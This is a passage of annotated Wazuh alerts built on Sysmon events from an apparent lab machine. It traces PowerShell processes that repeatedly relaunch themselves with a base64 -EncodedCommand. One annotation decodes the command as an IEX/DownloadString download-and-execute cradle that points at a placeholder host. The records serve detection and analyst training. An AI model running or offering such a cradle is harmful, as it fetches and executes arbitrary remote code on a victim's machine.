LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00}
ParentProcessId: 17020
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered Sysmon message text as Windows formats it. The same values are parsed out into the data.win.eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:56:01.682 When Sysmon observed the process start (UTC). Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-c181-680a-eb0c-000000000e00} Sysmon's unique ID for the process; it survives PID reuse and reboots. Join key: later events from this process carry it as processGuid, its children carry it as parentProcessGuid.
data.win.eventdata.processId: 384 Windows PID. PIDs are reused after exit, so pivot on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executed binary.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the binary's PE version resource.
data.win.eventdata.description: Windows PowerShell Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company from the PE version resource; an unexpected vendor, or one that does not fit the path, is a lead.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the PE version resource; compare it with the file name in image to spot renamed binaries.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line; the doubled backslashes are JSON escaping. The -EncodedCommand argument is base64 over UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), the same download-and-execute cradle as in the two Process Create alerts before this one.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (DOMAIN\user). The domain part equals the hostname, so this is a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Logon session the process belongs to; correlate with Security event 4624.
data.win.eventdata.logonId: 0x26584 The same logon session as a hex logon ID (LUID).
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 = interactive desktop session, 0 = services.
data.win.eventdata.integrityLevel: Medium Medium = not elevated; High = running as administrator.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash(es) of the image, as configured in Sysmon. Pivot for reputation lookups and for spotting a swapped binary.
data.win.eventdata.parentProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} Sysmon GUID of the parent. It equals the processGuid of the previous Process Create alert (PID 17020), so the chain is now 8356, 12424, 17020, 384.
data.win.eventdata.parentProcessId: 17020 Parent's PID at the time of the spawn.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent's binary; the same as image here, i.e. PowerShell spawning PowerShell.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line; identical to commandLine, so the process is re-launching itself with the same encoded payload.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 126 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535366.2770627 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:03.7645310Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350596 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:03.676
ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00}
ProcessId: 384
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k4xjswto.1mn.ps1
CreationUtcTime: 2025-04-24 22:56:03.676
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:03.676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c181-680a-eb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k4xjswto.1mn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:03.676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 123 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535370.2773388 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:07.9049338Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350610 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:05.130
ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00}
ProcessId: 15128
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00}
ParentProcessId: 384
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:05.130 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c185-680a-ed0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 127 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535370.2781451 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:08.2961603Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350611 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:08.275
ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00}
ProcessId: 15128
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f1rrcy3r.32z.ps1
CreationUtcTime: 2025-04-24 22:56:08.275
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:08.275 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c185-680a-ed0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f1rrcy3r.32z.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:08.275 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 124 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535372.2784220 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:11.0019319Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350641 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:09.719
ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00}
ProcessId: 2932
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00}
ParentProcessId: 15128
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:09.719 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c189-680a-f00c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
